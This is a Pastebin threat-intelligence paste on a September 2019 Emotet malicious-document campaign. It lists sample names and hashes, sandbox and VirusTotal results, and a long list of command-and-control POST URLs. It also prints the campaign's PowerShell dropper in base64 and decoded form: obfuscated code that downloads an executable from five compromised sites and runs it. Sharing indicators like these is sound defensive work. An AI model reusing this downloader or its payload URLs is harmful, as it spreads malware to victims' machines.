API tools faq
paste
Advertisement
HerbieZimmerman

2019-09-18 Emotet

HerbieZimmerman
Sep 18th, 2019
895
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.06 KB | None | 0 0
raw download clone embed print report
  1. Github repo with maldocs: https://github.com/bloomer1016/2019-09-18-Emotet/tree/master
  2.  
  3. Any.Run results for some
  4. =========================
  5. https://app.any.run/tasks/5d921b3e-fc42-48fd-96b4-a0c84c6df7ca
  6. https://app.any.run/tasks/a95d5234-04a9-4a86-b284-3189e92fad31
  7. https://app.any.run/tasks/3bdf63a3-755a-4819-ad82-5dc24b75afb7
  8.  
  9. Maldoc name and hashes
  10. =======================
  11. 844545613263975.doc = d0549a23f032dd31c0b4f6ce52dc2b68
  12. BL_4FGY5QJ54MQ.doc = 611e1f0d8d8b5ea6021b80c57521dd5f
  13. BL_B5HP885M08_HB.doc = 2792353f03a08766d5a8a5cfcdc11755
  14. Documents503562.doc = c23fef65dca1134add0911598e144962
  15. FT_GNVGZ8X52TM.doc = 11aeba89608c7a1c76c03124c0deb224
  16. FT_Q8I5N0EAY6.doc = 23709a5f4e852eb64e8cb16bef0b4af3
  17. LLC_6001165714_L_09182019.doc = 8264fee8922f4a49728da27c23915c04
  18. RE_A5V5YRMEMG7EEN_09182019.doc = e0ebff22ce0e5083669ed163017610a3
  19. SCANMR-35747.doc = b06323ecc2d3d3c7520adddcede27b23
  20. info-09_18_2019233916.doc = 890b71c6603640a7b6afb9a1aa2c4db9
  21.  
  22. Munin results
  23. ==============
  24. Online Hash Checker for Virustotal and Other Services
  25. Florian Roth - 0.13.0 April 2019
  26.  
  27.  
  28. [+] Writing results to new file: check-results_attach.csv
  29. [ ] Processing /attach/FT_Q8I5N0EAY6.doc ...
  30. [ ] Processing /attach/SCANMR-35747.doc ...
  31. [ ] Processing /attach/LLC_6001165714_L_09182019.doc ...
  32. [ ] Processing /attach/info-09_18_2019233916.doc ...
  33. [ ] Processing /attach/BL_B5HP885M08_HB.doc ...
  34. [ ] Processing /attach/FT_GNVGZ8X52TM.doc ...
  35. [ ] Processing /attach/844545613263975.doc ...
  36. [ ] Processing /attach/RE_A5V5YRMEMG7EEN_09182019.doc ...
  37. [ ] Processing /attach/BL_4FGY5QJ54MQ.doc ...
  38. [ ] Processing /attach/Documents503562.doc ...
  39. [+] Processing 10 lines ...
  40.  
  41. 1 / 10 > Unknown
  42. HASH: 19aafd3b374956bb8ed67f231e0bb5797143e23f37617e66784cb29c3c6a10dd COMMENT: /attach/FT_Q8I5N0EAY6.doc
  43. RESULT: - / -
  44.  
  45. 2 / 10 > Malicious
  46. HASH: f4903ce8ea06e78db686bccd687857f7129f425cb03b79ac39ee6a7ad5567d2e COMMENT: /attach/SCANMR-35747.doc
  47. VIRUS: Microsoft: Trojan:Script/Conteban.A!ml / TrendMicro: HEUR_VBA.O2
  48. TYPE: - FILENAMES: -
  49. FIRST: - LAST: 2019-09-18 19:50:41 COMMENTS: 0 USERS: -
  50. RESULT: 16 / 56
  51.  
  52. 3 / 10 > Malicious
  53. HASH: 6dba64beab05a8cbbbb0c7ed465447c1ddd4484daa784737860f48b3c835336e COMMENT: /attach/LLC_6001165714_L_09182019.doc
  54. VIRUS: Microsoft: Trojan:O97M/Sonbokli.A!cl / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
  55. TYPE: - FILENAMES: -
  56. FIRST: - LAST: 2019-09-18 19:11:50 COMMENTS: 0 USERS: -
  57. RESULT: 14 / 58
  58.  
  59. 4 / 10 > Unknown
  60. HASH: 44193897b15e5b25abd4fdaec44923b9b44eef2d49b330934bc47f91d6a82107 COMMENT: /attach/info-09_18_2019233916.doc
  61. RESULT: - / -
  62.  
  63. 5 / 10 > Unknown
  64. HASH: 7b2142363813a41fd3a512ca6bbd2e3d73d274558f58ca990d78a1537ebfcbd8 COMMENT: /attach/BL_B5HP885M08_HB.doc
  65. RESULT: - / -
  66.  
  67. 6 / 10 > Malicious
  68. HASH: 4a89881dbe35b5b96414f7f258ce83bb65b908330a2d01a73a38996cf4766345 COMMENT: /attach/FT_GNVGZ8X52TM.doc
  69. VIRUS: Microsoft: Trojan:Script/Oneeva.A!ml / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
  70. TYPE: - FILENAMES: -
  71. FIRST: - LAST: 2019-09-18 18:01:08 COMMENTS: 0 USERS: -
  72. RESULT: 14 / 56
  73.  
  74. 7 / 10 > Unknown
  75. HASH: 5c39f7d201d031baea0aa681c8b159c59beaca86729cb6cbaaa1b3d30b7386ed COMMENT: /attach/844545613263975.doc
  76. RESULT: - / -
  77.  
  78. 8 / 10 > Malicious
  79. HASH: 4b00391f7bbb49f146f425f7beb285222e26de316b87e4fd8e70e490015a1bec COMMENT: /attach/RE_A5V5YRMEMG7EEN_09182019.doc
  80. VIRUS: Microsoft: Trojan:Win32/Ludicrouz.O / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
  81. TYPE: - FILENAMES: -
  82. FIRST: - LAST: 2019-09-18 18:09:01 COMMENTS: 0 USERS: -
  83. RESULT: 14 / 58
  84.  
  85. 9 / 10 > Malicious
  86. HASH: e52d9448e78d875f07fc9cdbe18ebbf755a69b95aec37d147d0ce509de3e7c66 COMMENT: /attach/BL_4FGY5QJ54MQ.doc
  87. VIRUS: Microsoft: Trojan:O97M/Sonbokli.A!cl / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
  88. TYPE: - FILENAMES: -
  89. FIRST: - LAST: 2019-09-18 18:03:11 COMMENTS: 0 USERS: -
  90. RESULT: 13 / 58
  91.  
  92. 10 / 10 > Malicious
  93. HASH: 42f0de30c375368ea3c82c734129cf1902476f44404e4d7eaef3bfd5f1a1cf8a COMMENT: /attach/Documents503562.doc
  94. VIRUS: Microsoft: Trojan:Script/Oneeva.A!ml / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
  95. TYPE: - FILENAMES: -
  96. FIRST: - LAST: 2019-09-18 17:33:40 COMMENTS: 0 USERS: -
  97. RESULT: 16 / 59
  98.  
  99. PoSH encoded command
  100. =====================
  101. JABQAGEAaQAxAFUAaQAxADMAPQAnAHAAQQBUAGMAUwBqAGwAJwA7ACQAdwBpAGEAWQBXAEUAIAA9ACAAJwAxADMAMwAnADsAJABqAEwAXwBLAG4AUwBaADIAPQAnAGQAYgB0AFoARAAzAHUAaQAnADsAJABHADIAdwB2AEEATwBDAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGkAYQBZAFcARQArACcALgBlAHgAZQAnADsAJAB6ADUARQB3AE8AMgB2AD0AJwBzAHoATwBHAFAASwAnADsAJABRADgAawB6AGoAegAwAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBCAGMAbABJAEUAbgBUADsAJABuAGIATABPAE4AZABXAFYAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAYQB0AHIAaQBjAGsAZwBsAG8AYgBhAGwAdQBzAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGYAUwBSAGsAQQBGAGoAcQB2AC8AQABoAHQAdABwAHMAOgAvAC8AcABpAHAAaQB6AGgAYQBuAHoAaABhAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AMwBjAGkAbwByAG4AegBfAGkAdQBsAGEAeQBzAGMAegAtADYANwA5ADYANAA2AC8AQABoAHQAdABwAHMAOgAvAC8AdABhAG4AawBoAG8AaQAuAHYAbgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFgAVABTAHUAZwB6AE4AYQB6AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAHUAcABlAHIAYwByAHkAcwB0AGEAbAAuAGEAbQAvAHcAcAAtAGEAZABtAGkAbgAvAFAAZABNAEkAbgBTAGcAcwAvAEAAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbAAtAGIAcgBpAHMAdABvAGwALgBsAHUALwBkAGwAcgB5AC8ATQBBAG4ASgBJAFAAbgBZAC8AJwAuACIAUwBwAGAAbABpAHQAIgAoACcAQAAnACkAOwAkAFEATgBCAEUAXwByADkAPQAnAE8ANQBaAGEAMQBDAFUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMANgBmADgAUgBXAFIAIABpAG4AIAAkAG4AYgBMAE8ATgBkAFcAVgApAHsAdAByAHkAewAkAFEAOABrAHoAagB6ADAALgAiAGQAYABPAFcAYABOAGwATwBBAEQAYABGAGkATABFACIAKAAkAFMANgBmADgAUgBXAFIALAAgACQARwAyAHcAdgBBAE8AQwApADsAJABwAEgATAA3AHcAaAA9ACcAUQBMAFYAVgBkAFAAOAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEcAMgB3AHYAQQBPAEMAKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAyADgAOAAwADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAFQAIgAoACQARwAyAHcAdgBBAE8AQwApADsAJABvAFMAOQBNAEcAOQAzAD0AJwBFADEAQgB1ADYAagBPAFgAJwA7AGIAcgBlAGEAawA7ACQAVABiAGYASgBhAFkAPQAnAEIAegBwAGMAXwBaAHMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABtAEEATwBFAE4APQAnAG0AUgBiAGIAMQBQADMAOAAnAA==
  102.  
  103. Decoded PoSH command
  104. ====================
  105. $Pai1Ui13='pATcSjl'
  106. $wiaYWE = '133'
  107. $jL_KnSZ2='dbtZD3ui'
  108. $G2wvAOC=$env:userprofile+'\'+$wiaYWE+'.exe'
  109. $z5EwO2v='szOGPK'
  110. $Q8kzjz0=&('new-obje'+'c'+'t') neT.weBclIEnT
  111. $nbLONdWV='https://www.patrickglobalusa.com/wp-admin/fSRkAFjqv/
  112. https://pipizhanzhang.com/wp-admin/3ciornz_iulayscz-679646/
  113. https://tankhoi.vn/wp-includes/XTSugzNaz/
  114. https://www.supercrystal.am/wp-admin/PdMInSgs/
  115. https://hotel-bristol.lu/dlry/MAnJIPnY/'."Sp`lit"('
  116. ')
  117. $QNBE_r9='O5Za1CU'
  118. foreach($S6f8RWR in $nbLONdWV){try{$Q8kzjz0."d`OW`NlOAD`FiLE"($S6f8RWR, $G2wvAOC)
  119. $pHL7wh='QLVVdP8'
  120. If ((.('Ge'+'t-'+'Item') $G2wvAOC)."LE`NGTH" -ge 28807) {[Diagnostics.Process]::"StA`RT"($G2wvAOC)
  121. $oS9MG93='E1Bu6jOX'
  122. break
  123. $TbfJaY='Bzpc_Zs'}}catch{}}$DmAOEN='mRbb1P38'
  124.  
  125. C2's traffic
  126. =============
  127. POST http://190.18.146.70/mult/cookies/
  128. POST http://187.147.50.167:8080/entries/odbc/
  129. POST http://178.254.6.27:7080/ban/codec/sess/merge/
  130. POST http://92.222.125.16:7080/tpt/tpt/sess/
  131. POST http://142.44.162.209:8080/ringin/
  132. POST http://31.12.67.62:7080/arizona/
  133. POST http://45.123.3.54:443/pnp/
  134. POST http://201.250.11.236:50000/codec/
  135. POST http://41.220.119.246/jit/
  136. POST http://86.98.25.30:53/arizona/
  137. POST http://37.157.194.134:443/teapot/
  138. POST http://187.144.189.58:50000/codec/
  139. POST http://189.209.217.49/jit/
  140. POST http://31.172.240.91:8080/arizona/
  141. POST http://104.131.11.150:8080/teapot/
  142. POST http://59.152.93.46:443/site/
  143. POST http://222.214.218.192:8080/arizona/
  144. POST http://162.243.125.212:8080/teapot/
  145. POST http://169.239.182.217:8080/site/
  146. POST http://85.104.59.244:20/xian/
  147. POST http://95.128.43.213:8080/arizona/
  148. POST http://91.92.191.134:8080/site/
  149. POST http://144.139.247.220/xian/
  150. POST http://87.230.19.21:8080/loadan/
  151. POST http://117.197.124.36:443/teapot/
  152. POST http://173.212.203.26:8080/site/
  153. POST http://206.189.98.125:8080/xian/
  154. POST http://45.33.49.124:443/loadan/
  155. POST http://62.75.187.192:8080/codec/iplk/sess/merge/
  156. POST http://136.243.177.26:8080/iplk/psec/sess/
  157. POST http://91.205.215.66:8080/usbccid/badge/
  158. POST http://186.4.172.5:443/iplk/balloon/sess/
  159. POST http://185.129.92.210:7080/vermont/
  160. POST http://182.176.132.213:8090/report/
  161. POST http://87.106.139.101:8080/child/
  162. POST http://87.106.136.232:8080/dma/
  163. POST http://188.166.253.46:8080/iplk/
  164. POST http://37.208.39.59:7080/child/
  165. POST http://185.94.252.13:443/attrib/merge/sess/
  166. POST http://175.100.138.82:22/pdf/sym/
  167. POST http://78.24.219.147:8080/attrib/bml/sess/
  168. POST http://201.212.57.109/pnp/
  169. POST http://217.160.182.191:8080/entries/
  170. POST http://186.4.172.5:8080/forced/
  171. POST http://138.201.140.110:8080/mult/
  172. POST http://182.76.6.2:8080/health/
  173. POST http://190.145.67.134:8090/acquire/
  174. POST http://47.41.213.2:22/entries/
  175. POST http://159.65.25.128:8080/forced/
  176. POST http://75.127.14.170:8080/ringin/
  177. POST http://190.201.164.223:53/mult/
  178. POST http://94.205.247.10/health/
  179. POST http://177.246.193.139:20/entries/
  180. POST http://149.202.153.252:8080/forced/
  181. POST http://88.156.97.210/ringin/
  182. POST http://178.79.161.166:443/mult/
  183. POST http://46.105.131.87/health/
  184. POST http://211.63.71.72:8080/cab/prep/sess/
  185. POST http://179.32.19.219:22/enable/publish/sess/merge/
  186. POST http://190.186.203.55/arizona/iab/sess/merge/
  187. POST http://104.236.246.93:8080/publish/schema/sess/
  188. POST http://92.222.216.44:8080/psec/
  189. POST http://212.71.234.16:8080/raster/
  190. POST http://182.176.106.43:995/entries/
  191. POST http://190.18.146.70/sess/
  192. POST http://187.147.50.167:8080/enable/
  193. POST http://178.254.6.27:7080/raster/
  194. POST http://92.222.125.16:7080/entries/
  195. POST http://142.44.162.209:8080/tlb/
  196. POST http://31.12.67.62:7080/sess/
  197. POST http://45.123.3.54:443/enable/
  198. POST http://201.250.11.236:50000/health/
  199. POST http://41.220.119.246/raster/
  200. POST http://86.98.25.30:53/glitch/
  201. POST http://37.157.194.134:443/tlb/
  202. POST http://187.144.189.58:50000/sess/
  203. POST http://189.209.217.49/enable/
  204. POST http://31.172.240.91:8080/health/
  205. POST http://104.131.11.150:8080/raster/
  206. POST http://59.152.93.46:443/glitch/
  207. POST http://222.214.218.192:8080/sess/
  208. POST http://162.243.125.212:8080/enable/
  209. POST http://169.239.182.217:8080/codec/
  210. POST http://85.104.59.244:20/raster/
  211. POST http://95.128.43.213:8080/glitch/
  212. POST http://91.92.191.134:8080/srvc/
  213. POST http://144.139.247.220/enable/
  214. POST http://87.230.19.21:8080/codec/
  215. POST http://117.197.124.36:443/scripts/
  216. POST http://173.212.203.26:8080/glitch/
  217. POST http://206.189.98.125:8080/arizona/
  218. POST http://45.33.49.124:443/srvc/
  219. POST http://62.75.187.192:8080/schema/arizona/ringin/merge/
  220. POST http://136.243.177.26:8080/devices/loadan/ringin/
  221. POST http://91.205.215.66:8080/devices/free/
  222. POST http://186.4.172.5:443/prep/jit/ringin/
  223. POST http://185.129.92.210:7080/json/add/ringin/merge/
  224. POST http://182.176.132.213:8090/mult/stubs/
  225. POST http://87.106.139.101:8080/acquire/ringin/ringin/merge/
  226. POST http://87.106.136.232:8080/xian/prep/ringin/merge/
  227. POST http://188.166.253.46:8080/raster/publish/ringin/
  228. POST http://37.208.39.59:7080/vermont/
  229. POST http://185.94.252.13:443/iab/
  230. POST http://175.100.138.82:22/between/
  231. POST http://78.24.219.147:8080/enabled/
  232. POST http://201.212.57.109/vermont/
  233. POST http://217.160.182.191:8080/iab/
  234. POST http://186.4.172.5:8080/between/
  235. POST http://138.201.140.110:8080/vermont/
  236. POST http://182.76.6.2:8080/iab/
  237. POST http://190.145.67.134:8090/between/
  238. POST http://47.41.213.2:22/enabled/
  239. POST http://159.65.25.128:8080/vermont/
  240. POST http://75.127.14.170:8080/schema/
  241. POST http://190.201.164.223:53/between/
  242. POST http://94.205.247.10/enabled/
  243. POST http://177.246.193.139:20/schema/
  244. POST http://149.202.153.252:8080/between/
  245. POST http://88.156.97.210/sym/
  246. POST http://178.79.161.166:443/prov/
  247. POST http://46.105.131.87/schema/
  248. POST http://211.63.71.72:8080/between/
  249. POST http://179.32.19.219:22/sym/
  250. POST http://190.186.203.55/prov/
  251. POST http://104.236.246.93:8080/publish/free/ringin/merge/
  252. POST http://92.222.216.44:8080/pnp/add/
  253. POST http://212.71.234.16:8080/attrib/stubs/ringin/merge/
  254. POST http://182.176.106.43:995/enable/ringin/ringin/merge/
  255. POST http://190.18.146.70/taskbar/
  256. POST http://187.147.50.167:8080/ban/schema/ringin/
  257. POST http://178.254.6.27:7080/walk/prov/ringin/
  258. POST http://92.222.125.16:7080/codec/
  259. POST http://142.44.162.209:8080/ringin/
  260. POST http://31.12.67.62:7080/add/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!